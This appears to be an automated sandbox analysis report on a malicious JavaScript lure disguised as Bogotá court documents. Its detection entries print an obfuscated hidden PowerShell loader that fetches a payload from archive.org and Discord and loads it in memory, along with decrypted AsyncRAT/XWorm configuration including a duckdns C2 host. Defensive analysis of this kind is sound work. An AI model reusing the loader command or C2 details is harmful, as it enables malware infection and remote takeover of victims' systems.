DIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbQBlAHIAYwBoAGEAbgB0AGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAGUAcgBjAGgAYQBuAHQAZQByAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAGgAYQBsAHQAZQByAGkAYQAgAD0AIAAkAG0AZQByAGMAaABhAG4AdABlAHIALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcAB5AHIAbwBnAG4AbwBzAHQAaQBjAHMAKQA7ACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGgAYQBsAHQAZQByAGkAYQApADsAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABmAHIAdQBpAHQAZQByAGUAcgBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAG8AdgBlAHIAZgBsAGkAZwBoAHQAcwAgAD0AIAAkAGMAYQByAHAAZQB0AGIAYQBnAGcAaQBuAGcALgBJAG4AZABlAHgATwBmACgAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACkAOwAkAHAAbABlAG8AbQBhAHoAaQBhACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAEkAbgBkAGUAeABPAGYAKAAkAGYAcgB1AGkAdABlAHIAZQByAHMAKQA7ACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtAGcAdAAgACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzADsAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAIAArAD0AIAAkAHIAaABhAGIAZABvAG0AYQBuAHQAaQBzAHQALgBMAGUAbgBnAHQAaAA7ACQAQgB1AHgAdQBzACAAPQAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtACAAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAOwAkAGIAbABpAG4AZwB5ACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABvAHYAZQByAGYAbABpAGcAaAB0AHMALAAgACQAQgB1AHgAdQBzACkAOwAkAFQAaQB0AGEAbgBpAGEAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAG
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = 'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYAZQA1ADUAMQA0ADUAMQA1AGQAOQA3ADUAOABlAGEAZgBhAGIAMQAwADIANgAzAGQAYwA1ADYAOAA1ADcAZgAxADcAZQA4ADgAMgAwAGQAOQA0ADAAMQBkAGYAYQA2ADMAOQA5ADQANQA2AGUANAA1AGUAMgBjADIANAAwAGIAZAA9AG0AaAAmADEAZgAxADAAYgAwADgANgA9AHMAaQAmADEANwAzADUAYwAwADgANgA9AHgAZQA/ACMAeAAjAC4AZQBsAGkARgBkAGUAIwByAGUAdgBuAG8AQwAvADMAOAA2ADUAMwAyADIAMwAyADcAOAA5ADYAOAA5ADQANgAzADEALwA1ADUAMgAxADcANQAwADUAMQA2ADkANQA2ADEAMQA0ADUAMwAxAC8AcwAjAG4AZQBtAGgAYwBhACMAIwBhAC8AbQBvAGMALgBwAHAAYQBkAHIAbwBjAHMAaQBkAC4AbgBkAGMALwAvADoAcwBwACMAIwBoACcAOwAkAHAAcgBlAHMAYwByAGkAYgBpAG4AZwAgAD0AIAAkAGMAaABvAG4AZAByAG8AcwB0AG8AbQBhACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABwAHkAcgBvAGcAbgBvAHMAdABpAGMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbQBlAHIAYwBoAGEAbgB0AGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAGUAcgBjAGgAYQBuAHQAZQByAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAGgAYQBsAHQAZQByAGkAYQAgAD0AIAAkAG0AZQByAGMAaABhAG4AdABlAHIALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcAB5AHIAbwBnAG4AbwBzAHQAaQBjAHMAKQA7ACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGgAYQBsAHQAZQByAGkAYQApADsAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABmAHIAdQBpAHQAZQByAGUAcgBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAG8AdgBlAHIAZgBsAGkAZwBoAHQAcwAgAD0AIAAkAGMAYQByAHAAZQB0AGIAYQBnAGcAaQBuAGcALgBJAG4AZABlAHgATwBmACgAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACkAOwAkAHAAbABlAG8AbQBhAHoAaQBhACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAEkAbgBkAGUAeABPAGYAKAAkAGYAcgB1AGkAdABlAHIAZQByAHMAKQA7ACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtAGcAdAAgACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzADsAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAIAArAD0AIAAkAHIAaABhAGIAZABvAG0AYQBuAHQAaQBzAHQALgBMAGUAbgBnAHQAaAA7ACQAQgB1AHgAdQBzACAAPQAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtACAAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAOwAkAGIAbABpAG4AZwB5ACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABvAHYAZQByAGYAbABpAGcAaAB0AHMALAAgACQAQgB1AHgAdQBzACkAOwAkAFQAaQB0AGEAbgBpAGEAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGwAaQBuAGcAeQApADsAJABtAGUAbAB0AGkAZQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAFQAaQB0AGEAbgBpAGEAbgApADsAJAByAG8AcwB0AHIAYQB0AHUAbABhACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AF
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js", ProcessId: 7548, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = 'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYAZQA1ADUAMQA0ADUAMQA1AGQAOQA3ADUAOABlAGEAZgBhAGIAMQAwADIANgAzAGQAYwA1ADYAOAA1ADcAZgAxADcAZQA4ADgAMgAwAGQAOQA0ADAAMQBkAGYAYQA2ADMAOQA5ADQANQA2AGUANAA1AGUAMgBjADIANAAwAGIAZAA9AG0AaAAmADEAZgAxADAAYgAwADgANgA9AHMAaQAmADEANwAzADUAYwAwADgANgA9AHgAZQA/ACMAeAAjAC4AZQBsAGkARgBkAGUAIwByAGUAdgBuAG8AQwAvADMAOAA2ADUAMwAyADIAMwAyADcAOAA5ADYAOAA5ADQANgAzADEALwA1ADUAMgAxADcANQAwADUAMQA2ADkANQA2ADEAMQA0ADUAMwAxAC8AcwAjAG4AZQBtAGgAYwBhACMAIwBhAC8AbQBvAGMALgBwAHAAYQBkAHIAbwBjAHMAaQBkAC4AbgBkAGMALwAvADoAcwBwACMAIwBoACcAOwAkAHAAcgBlAHMAYwByAGkAYgBpAG4AZwAgAD0AIAAkAGMAaABvAG4AZAByAG8AcwB0AG8AbQBhACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABwAHkAcgBvAGcAbgBvAHMAdABpAGMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbQBlAHIAYwBoAGEAbgB0AGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAGUAcgBjAGgAYQBuAHQAZQByAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAGgAYQBsAHQAZQByAGkAYQAgAD0AIAAkAG0AZQByAGMAaABhAG4AdABlAHIALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcAB5AHIAbwBnAG4AbwBzAHQAaQBjAHMAKQA7ACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGgAYQBsAHQAZQByAGkAYQApADsAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABmAHIAdQBpAHQAZQByAGUAcgBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAG8AdgBlAHIAZgBsAGkAZwBoAHQAcwAgAD0AIAAkAGMAYQByAHAAZQB0AGIAYQBnAGcAaQBuAGcALgBJAG4AZABlAHgATwBmACgAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACkAOwAkAHAAbABlAG8AbQBhAHoAaQBhACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAEkAbgBkAGUAeABPAGYAKAAkAGYAcgB1AGkAdABlAHIAZQByAHMAKQA7ACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtAGcAdAAgACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzADsAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAIAArAD0AIAAkAHIAaABhAGIAZABvAG0AYQBuAHQAaQBzAHQALgBMAGUAbgBnAHQAaAA7ACQAQgB1AHgAdQBzACAAPQAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtACAAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAOwAkAGIAbABpAG4AZwB5ACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABvAHYAZQByAGYAbABpAGcAaAB0AHMALAAgACQAQgB1AHgAdQBzACkAOwAkAFQAaQB0AGEAbgBpAGEAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGwAaQBuAGcAeQApADsAJABtAGUAbAB0AGkAZQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAFQAaQB0AGEAbgBpAGEAbgApADsAJAByAG8AcwB0AHIAYQB0AHUAbABhACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AF

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-04-26T02:53:50.051922+020020204241Exploit Kit Activity Detected162.159.134.233443192.168.2.449723TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-04-26T02:53:50.197242+020020576351A Network Trojan was detected162.159.134.233443192.168.2.449723TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-04-26T02:53:48.006563+020020490381A Network Trojan was detected207.241.233.30443192.168.2.449720TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-04-26T02:53:50.197242+020028582951A Network Trojan was detected162.159.134.233443192.168.2.449723TCP

              Joe Sandbox Signatures

              • AV Detection
              • Exploits
              • Compliance
              • Software Vulnerabilities
              • Networking
              • Key, Mouse, Clipboard, Microphone and Screen Capturing
              • System Summary
              • Data Obfuscation
              • Boot Survival
              • Hooking and other Techniques for Hiding and Protection
              • Malware Analysis System Evasion
              • Anti Debugging
              • HIPS / PFW / Operating System Protection Evasion
              • Language, Device and Operating System Detection
              • Lowering of HIPS / PFW / Operating System Security Settings

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).jsVirustotal: Detection: 31%Perma Link
              Source: Submited SampleNeural Call Log Analysis: 99.5%
              Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: 3030
              Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: envio2333.duckdns.org
              Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: | CRACKED BY https://t.me/xworm_v2
              Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: false
              Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: AsyncMutex_6SI8OkPnk
              Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: MIIE8jCCAtqgAwIBAgIQAOQb7nA/hP/L1XXxqdDJNzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjMwNTI1MDUyMTIyWhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIykAVxs0s6rZ/dwP6ujJtpnj6RSsCsZN6Cfj1InZxSIswX+zNiKJys8xyLlyexoya3ebLp5gOSzNvGMlxluLm9vCaayOzt8HuaCCUFntv/AIiigkbE2gqVYjh7qdObXhyhAgjuygHDP0QCc+VzP1aVH4CesUy1gGvxgOgmdXok2AjCssH69OYGA/DAdEzaOK7TtFqS2qqCzCldLuNBa2xy0/Yb73Zko42hlx+hvp/ciTNyFDXqIBdUIu/6X3on+ecdW8SiLMjzr8Xf1BHcoVgTbDto7EpNq2a1b2CjI23YMlc+mRq33k6R2Dw0NNZmNdnTjnFFVmZZ419g2qIxR+JetlOui7Lc77pKX5Om0+HBZqQYKTCxMVykxz0G7EuAxIXG01Wlogv1Ulj31UH2APYQpgRyZ2DUhqJ1Ls3MLxd3X4UJ00DLnhOQf4bSxqZityJ+17tFLj/qSw8niWYm9lzor2652DmCyw2tFMOnkrnBStNaymtyE5JiN3hZ+3xLlCShjHbR6ANpnmPJJWyUnVLHzYj9Fg5cVrfcIHfGDxkh6P/x32CuG1uzxFS0NsZIG6dsiNmBJLZ/B+JQp2V5a1ux3bwzlgEd3OYdDAf8KzXjFmnhfLqhBN/e33eAYdLtZ5ijj9VTACHiEA73NNTROv+9MrHe+jlDqDX+JFS2HTRktAgMBAAGjMjAwMB0GA1UdDgQWBBSGuCNUrBGiR5cyCuX6uVeVEgA8yDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBBMeYWK/JJKSBUsQ4Ba2RHStyT+uunyfCP9ht58sDUygZWxFQxl4Tmw1JLTRjU2FNia9d73P3k7BuDux/zSWJy0rc+Yr5H174M86L7rXyM/dhyZ26Ansn3rxNG7OJP+UQh559z7wwa5sVstFlVyAZOYFBUGGGMhCK/odXhRgJxnWwPR5LKzbQKGXNsvYfnyjWsh65631ZSMvoH3eblBluOwhvCHP7MotRPD8xkmMfIL9npMprJRPHco5MnenLv9c1R6x7AS93fEh359l3fOdL1LTU5K7Q0FydPztV19HDkJyotROS1hOiWze1LNQLXQ6701jb20bIcxeeWyfzJSew1p6j/iIvbBBEKoeQVx6gCXN2UHfZRzeoQKzWQPJ9EDaobDIZ6VyBJ3Vg2zCuFtLL73oJzycow0Rudn/2O9FHy6rucrLcyWxi4AiH+a0b2l1GwvZ/46TUdGFvygMflzdSxf/sVeCrYOTxXJBAnCyz1Yx5hcFI/lblBL70necTt0FDnwHQSWyrdouWYWlGupZ9HUKg6IpGEg9tx0mwyvIycHXTeeQ+NVHYR+WmbVcgYy5HIMPPOyAV7FVCjvRfQ9GofgzRasjDKSqMeWChkMC2zMjI6j6WzWDK5ZD6mCcTiP5P0f3tOkYV/+cw2elMNBmmDAnZVPwweENRxZ/YelFug7Q==
              Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: eo5W+cyFogOsZBqRmeR3Qmise+2PA0RGH6CqeLBjaNXaQ70WGynmUBKXpTvk4CqcQ0IdxcMHBbUMObFTBAboVP45ao04ZGT5tHJhRmrNBcf/RWNCPQKtsxn0EGI+l+OiH8j4eY9OD/RTDOfmxBOuHUIsX6Cz0S8XNRstAvmOh+eC1uZ+jxG6mxuUAC860YJESimAgDY+jrhp2wAS270tldFM5kMlnszHuySQ6JBSwwtmTxqZngqEDulrraXHrK8cukBebSvOG45YXdjzT050+f9IUfo79HlBAueArL54aImUfNCdz/06pv2o0wB2PFVvPeJvyb8O7nA1Zfi8rwpsUe8I1NSiodrcVly1jX3imWVRrfmFKZO0FBGrNPicEzm4q5NQ5LNnoxVdSM1fWOh5HW8jxmnkMKKQxS/Iav0z78gWE+mYz/w4h6CtbDARirCpiqgqDm8jn4eCRAxmhwVjcJiQ9n20I6AQTDPId6DE9SY0RofrA62+BnMX6gkkLIGtOzn2/jQWLQqGKzpbXFcSwVwni3SiKn5er3jICr7/cjviNgpd76ihR/6Jxnz1q7N48SATn9oW3boC9ywtkq4qebpjpfllyYGhFHLeyxAtlsC64zf6q7AUknLLMJVtLKmwyR72NiLX4cTGOvHoJ9PDOzyweC5nVg31OCri1dZUjmk=
              Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: null
              Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: Default
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpackString decryptor: 3030
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpackString decryptor: envio2333.duckdns.org
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpackString decryptor: | CRACKED BY https://t.me/xworm_v2
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpackString decryptor: false
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpackString decryptor: AsyncMutex_6SI8OkPnk
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpackString decryptor: MIIE8jCCAtqgAwIBAgIQAOQb7nA/hP/L1XXxqdDJNzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjMwNTI1MDUyMTIyWhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIykAVxs0s6rZ/dwP6ujJtpnj6RSsCsZN6Cfj1InZxSIswX+zNiKJys8xyLlyexoya3ebLp5gOSzNvGMlxluLm9vCaayOzt8HuaCCUFntv/AIiigkbE2gqVYjh7qdObXhyhAgjuygHDP0QCc+VzP1aVH4CesUy1gGvxgOgmdXok2AjCssH69OYGA/DAdEzaOK7TtFqS2qqCzCldLuNBa2xy0/Yb73Zko42hlx+hvp/ciTNyFDXqIBdUIu/6X3on+ecdW8SiLMjzr8Xf1BHcoVgTbDto7EpNq2a1b2CjI23YMlc+mRq33k6R2Dw0NNZmNdnTjnFFVmZZ419g2qIxR+JetlOui7Lc77pKX5Om0+HBZqQYKTCxMVykxz0G7EuAxIXG01Wlogv1Ulj31UH2APYQpgRyZ2DUhqJ1Ls3MLxd3X4UJ00DLnhOQf4bSxqZityJ+17tFLj/qSw8niWYm9lzor2652DmCyw2tFMOnkrnBStNaymtyE5JiN3hZ+3xLlCShjHbR6ANpnmPJJWyUnVLHzYj9Fg5cVrfcIHfGDxkh6P/x32CuG1uzxFS0NsZIG6dsiNmBJLZ/B+JQp2V5a1ux3bwzlgEd3OYdDAf8KzXjFmnhfLqhBN/e33eAYdLtZ5ijj9VTACHiEA73NNTROv+9MrHe+jlDqDX+JFS2HTRktAgMBAAGjMjAwMB0GA1UdDgQWBBSGuCNUrBGiR5cyCuX6uVeVEgA8yDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBBMeYWK/JJKSBUsQ4Ba2RHStyT+uunyfCP9ht58sDUygZWxFQxl4Tmw1JLTRjU2FNia9d73P3k7BuDux/zSWJy0rc+Yr5H174M86L7rXyM/dhyZ26Ansn3rxNG7OJP+UQh559z7wwa5sVstFlVyAZOYFBUGGGMhCK/odXhRgJxnWwPR5LKzbQKGXNsvYfnyjWsh65631ZSMvoH3eblBluOwhvCHP7MotRPD8xkmMfIL9npMprJRPHco5MnenLv9c1R6x7AS93fEh359l3fOdL1LTU5K7Q0FydPztV19HDkJyotROS1hOiWze1LNQLXQ6701jb20bIcxeeWyfzJSew1p6j/iIvbBBEKoeQVx6gCXN2UHfZRzeoQKzWQPJ9EDaobDIZ6VyBJ3Vg2zCuFtLL73oJzycow0Rudn/2O9FHy6rucrLcyWxi4AiH+a0b2l1GwvZ/46TUdGFvygMflzdSxf/sVeCrYOTxXJBAnCyz1Yx5hcFI/lblBL70necTt0FDnwHQSWyrdouWYWlGupZ9HUKg6IpGEg9tx0mwyvIycHXTeeQ+NVHYR+WmbVcgYy5HIMPPOyAV7FVCjvRfQ9GofgzRasjDKSqMeWChkMC2zMjI6j6WzWDK5ZD6mCcTiP5P0f3tOkYV/+cw2elMNBmmDAnZVPwweENRxZ/YelFug7Q==
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpackString decryptor: eo5W+cyFogOsZBqRmeR3Qmise+2PA0RGH6CqeLBjaNXaQ70WGynmUBKXpTvk4CqcQ0IdxcMHBbUMObFTBAboVP45ao04ZGT5tHJhRmrNBcf/RWNCPQKtsxn0EGI+l+OiH8j4eY9OD/RTDOfmxBOuHUIsX6Cz0S8XNRstAvmOh+eC1uZ+jxG6mxuUAC860YJESimAgDY+jrhp2wAS270tldFM5kMlnszHuySQ6JBSwwtmTxqZngqEDulrraXHrK8cukBebSvOG45YXdjzT050+f9IUfo79HlBAueArL54aImUfNCdz/06pv2o0wB2PFVvPeJvyb8O7nA1Zfi8rwpsUe8I1NSiodrcVly1jX3imWVRrfmFKZO0FBGrNPicEzm4q5NQ5LNnoxVdSM1fWOh5HW8jxmnkMKKQxS/Iav0z78gWE+mYz/w4h6CtbDARirCpiqgqDm8jn4eCRAxmhwVjcJiQ9n20I6AQTDPId6DE9SY0RofrA62+BnMX6gkkLIGtOzn2/jQWLQqGKzpbXFcSwVwni3SiKn5er3jICr7/cjviNgpd76ihR/6Jxnz1q7N48SATn9oW3boC9ywtkq4qebpjpfllyYGhFHLeyxAtlsC64zf6q7AUknLLMJVtLKmwyR72NiLX4cTGOvHoJ9PDOzyweC5nVg31OCri1dZUjmk=
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpackString decryptor: false
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpackString decryptor: false
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpackString decryptor: null
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpackString decryptor: false
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpackString decryptor: Default

              Exploits

              barindex
              Source: Yara matchFile source: 2.2.powershell.exe.13dac52fb3d.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.powershell.exe.13da504d358.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.powershell.exe.13dac470000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.powershell.exe.13dac470000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.powershell.exe.13da510ce95.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.powershell.exe.13da504d358.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
              Source: unknownHTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.4:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 207.241.233.30:443 -> 192.168.2.4:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49723 version: TLS 1.2
              Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
